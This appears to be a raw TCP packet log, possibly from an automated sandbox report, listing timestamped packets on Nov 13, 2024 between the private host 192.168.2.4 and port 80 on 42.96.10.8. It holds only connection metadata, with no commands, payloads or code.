                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945930958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945939064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945962906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945979118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945995092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945997953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945997953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946011066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946027040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946047068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946063042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946067095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946068048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946089983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946103096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946105003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946121931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946145058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946160078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946176052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946197033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946197033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946218967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946222067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946233988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946250916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946264982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946280003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946295977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946321964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946336031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946342945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946342945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946352005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946376085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946392059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946405888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946420908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946435928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946451902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946465969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946481943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946496964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946500063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946500063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946500063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946500063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946500063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946533918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946593046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946712971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946738958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946763039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946775913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946793079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946796894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946821928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946837902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946852922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946863890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946868896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946876049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946886063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946902037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946927071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946927071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946952105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946964979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.946989059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947005033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947017908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947017908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947019100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947036028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947052956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947052956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947078943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947093964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947109938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947134972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947149038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947165012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947168112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947180986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947185993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947196960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947246075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947280884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947297096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947310925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947331905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947350979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947350979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947357893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947384119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947398901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947413921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947431087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947438955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947438955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947446108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947463036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947477102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947494030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947504044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947504044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947509050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947525024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947555065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.947555065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.960253954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.984941006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.984966040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.984991074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.984996080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985007048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985024929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985035896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985040903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985055923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985070944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985083103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985086918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985100985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985116005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985130072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985143900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985148907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985148907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985160112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985176086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985183954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.985232115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987581968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987596989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987612963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987646103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987646103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987653971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987668991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987684965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987699986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987730026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987731934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987731934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987797022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987812042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987827063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987837076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987843990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987859964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987875938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987891912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987904072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987904072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987905979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987924099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987930059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987945080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987960100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987983942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987991095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987991095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.987999916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.988015890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.988030910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.988046885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.988059998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.988065004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.988065004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.988168001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017128944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017147064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017265081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017285109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017301083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017316103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017349005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017405033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017424107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017447948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017461061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017463923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017479897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017488956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017504930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017515898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017520905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017538071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017581940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017596960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017607927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017612934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017630100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017643929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017647028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017647028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017662048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017702103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017715931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017731905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017745018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017755985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017755985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017760038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017766953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017776966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017791986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017807007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017812014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017815113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017829895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017838955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.017859936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023324013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023340940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023355007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023381948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023394108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023396969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023415089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023426056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023426056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023432016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023462057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023477077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023495913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023519039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023699999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023713112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.023875952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.044543028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.044598103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.044635057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.044668913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.044677973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.044704914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.044715881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045634031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045669079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045687914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045705080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045795918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045830011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045838118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045865059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045898914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045948982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045957088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045957088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.045984030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.046041965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.046072006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.046082973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.046211958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052700996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052712917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052723885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052733898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052748919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052757025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052880049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052890062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052896023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052901983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052911043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052927971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052927971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.052958012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053402901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053523064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053531885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053541899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053553104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053560972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053580046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053581953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053591967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053596020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053605080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053617001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053643942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053683996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053684950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053695917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053706884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053713083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053721905 CET804973342.96.10.8192.168.2.4
